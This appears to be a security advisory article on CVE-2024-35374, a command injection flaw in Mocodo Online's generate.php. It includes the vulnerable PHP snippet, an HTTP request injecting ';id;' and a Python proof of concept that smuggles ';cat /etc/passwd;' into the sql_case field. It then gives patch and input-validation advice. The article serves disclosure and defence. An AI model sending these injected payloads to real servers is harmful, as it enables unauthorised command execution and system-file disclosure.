CVE CyberSecurity Database News

CVE-2024-35374 - Remote Code Execution in Mocodo Online via Unsanitized `sql_case` Input

Poster -

A critical security vulnerability, CVE-2024-35374, has been identified in Mocodo Online, affecting version 4.2.6 and below. This flaw allows attackers to perform remote code execution (RCE) by exploiting improper input sanitization in the /web/generate.php endpoint, specifically the sql_case field. Under certain circumstances, this can lead to full server compromise.

If you are running Mocodo Online up to v4.2.6, it is crucial to update immediately or apply strict mitigations.

What is Mocodo?

Mocodo is an open-source tool for creating and converting Entity-Relationship diagrams, especially aimed at database design. The online demo, Mocodo Online, is popular in classrooms, but when deployed in production or accessible on the public internet, it’s prone to abuse if left unpatched.

Where’s the problem?

Mocodo Online contains a PHP script, /web/generate.php, that handles user input for generating SQL code from diagrams. Among its form fields is sql_case, which the program uses without sanitization or escaping.

An attacker can send specially crafted sql_case input, injecting commands that the backend will process, leading to code execution on the server.

Let’s look at a simplified version of the vulnerable PHP code (from /web/generate.php)

<?php
// Simulated part of the code:
$sql_case = $_POST['sql_case'];
// Used in a command without escaping:
$command = "python3 generate_sql.py --case=$sql_case <other options>";
$output = shell_exec($command);
echo $output;
?>

The problem is the direct insertion of $sql_case into the command line, which makes it trivial to inject system commands.

With burp or curl, an attacker can supply

POST /web/generate.php HTTP/1.1
Host: mocodo.target
Content-Type: application/x-www-form-urlencoded

sql_case=;id;

Resulting system command

python3 generate_sql.py --case=;id; <other options>

This runs the id Linux command on your server after Python.

Here is a simple Python PoC that demonstrates the RCE in a vulnerable deployment

import requests

url = "http://mocodo.target/web/generate.php";

data = {
    "sql_case": ";cat /etc/passwd;",  # Replace with your payload
    # ... add other required form fields as needed
}

response = requests.post(url, data=data)
print(response.text)

If vulnerable, you will see the contents of /etc/passwd in the response.

References

- Original Advisory on GitHub
- NVD Listing
- Mocodo Official Repo
- Common command injection exploitation tutorial (PortSwigger)

Upgrade to the latest version. If you cannot, consider

1. Restricting access to /web/generate.php.

Never use unsanitized user input in system commands

- Use escapeshellarg(), escapeshellcmd(), or, preferably, switch to process functions that accept arrays (not strings) in newer PHP.

Example Safe PHP Code

$sql_case = $_POST['sql_case'];
$allowed_cases = ['upper', 'lower', 'capitalize'];
if (!in_array($sql_case, $allowed_cases)) {
    die("Invalid case option.");
}
$command = escapeshellcmd("python3 generate_sql.py --case=" . escapeshellarg($sql_case));
$output = shell_exec($command);

Summary

CVE-2024-35374 in Mocodo Online (v4.2.6 and below) is a serious security bug allowing remote attackers to run arbitrary commands and potentially take over your server. Patch now, validate all user input, and always be cautious when handling inputs that end up in system commands.

Timeline

Published on: 05/24/2024 21:15:59 UTC
Last modified on: 08/20/2024 15:35:14 UTC